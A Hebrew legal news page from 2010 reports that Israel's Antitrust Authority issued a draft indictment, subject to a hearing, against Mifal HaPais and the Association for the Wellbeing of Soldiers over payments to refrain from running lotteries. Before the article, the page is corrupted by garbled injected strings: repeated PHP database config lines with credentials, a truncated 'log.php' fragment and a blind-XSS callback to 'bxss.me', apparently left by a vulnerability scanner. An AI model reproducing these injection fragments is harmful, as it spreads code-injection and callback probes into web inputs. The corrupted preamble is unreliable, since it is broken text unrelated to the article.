$db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1ySf9n9nO"; ?> $db_host = "1" $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "19342244"; ?> ?>acker-9434/log.php?"; ?>{acx}}%>"; ?> $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> $db_name = "1"; ?>b_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?>>'hitvtgywpoinqc09d0.bxss.me')")"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> כתב אישום בכפוף לשימוע נגד מפעל הפיס והאגודה למען החייל
x

דיווח על תקלה

תאור תקלה:
שם:
דואר אלקטרוני:
חיפוש באתר
מאמרים אחרונים

טיוטתת כתב אישום נגד מפעל הפיס והאגודה למען החייל

תאריך: 09/08/2010 12:06   מחבר: מערכת האתר

הסדר כובל

עד לסוף שנות התשעים קיימה האגודה למען החייל הגרלות. בשנת 1988 כך נטען בהודעה שפרסה רשות ההגבלים העסקיים ביום 8 באוגוסט 2010, הגישו מפעל הפיס והאגודה למען החייל לממונה על ההגבלים העסקיים בקשה לאשר הסכם לפיו, האגודה למען החייל תימנע מעריכת הגרלות בתמורה לקבלת סכום כספי שנתי של 12 מליון ש"ח ממפעל הפיס.

הממונה על ההגבלים העסקיים סרב לאשר את ההסכם בין הצדדים וקבע כי מדובר בהסדר כובל העלול לפגוע בתחרות. עמדת הממונה הוצגה גם בהליך שהתקיים בעניין זה בפני בית הדין להגבלים עסקיים.

חקירה

בעקבות הדיון בבית הדין הצדדים להסדר משכו את בקשתם לאשר ההסדר המבוקש ובמקום זאת, חתמו בשנת 1999 על הסכם חדש ללא התחייבות להימנע מעריכת הגרלות מצד האגודה למען החייל.  בעשותם כן, עברו הצדדים לכאורה על עבירה של עשיית הסדר כובל. עצם המעשה הקים עילה לפתיחה בחקירה כנגד הצדדים החשודים. החקירה הושלמה, הראיות נבחנו וגובשו לטיוטת כתב אישום.

אישום ושימוע

לפי הנמסר בהודעה לצדדים ולציבור באמצעות כלי התקשורת, רשות ההגבלים הודיעה למפעל הפיס ולאגודה למען החייל, לנושאי משרה בכירים וליועץ המשפטי של מפעל הפיס בתקופת האישום , על כוונתה להגיש כתב אישום נגדם, בכפוף לשימוע, ביחס לעבירות על חוק ההגבלים העסקיים שבוצעו על ידם בין השנים 2004 ל - 2008. 

לפי טיוטת כתב האישום, בשנת 2004 חתמו מפעל הפיס והאגודה למען החייל על הסכם להעברת 8 מיליון ש"ח לשנה ממפעל הפיס לאגודה ולצידו במסמך נפרד, הסכימו כי האגודה תמנע מעריכת הגרלות, כל עוד מפעל הפיס ישלם לאגודה את הסכום המוסכם. המסמך הועבר ליועץ המשפטי של מפעל הפיס דאז, אשר סייע לצדדים לנסח אותו ואף שמר אותו בכספת משרדו.

בנוסף, ובהתאם למפורט בטיוטת כתב האישום, בשנת 2007 התקיים בין הצדדים הסדר כובל נוסף, שגם במסגרתו התחייבה האגודה למען החייל לא לקיים הגרלות, וזאת בתמורה לתשלום כספי מצד מפעל הפיס.

הרשות הודיעה לצדדים כי קיימת בפניהם האפשרות, להעלות את טיעוניהם במסגרת הליך שימוע, בטרם החלטה על הגשת כתב האישום.

נציין, כי הצדדים רשאים לסרב להליך השימוע ואז הטיוטה הופכת לכתב אישום רשמי. עם זאת, קיימת אפשרות שלאחר השימוע תשתכנע הרשות לבטל את כתב האישום, להוריד סעיפים ו/או להגיע להסדרי טיעון שידרשו את אישור בית המשפט.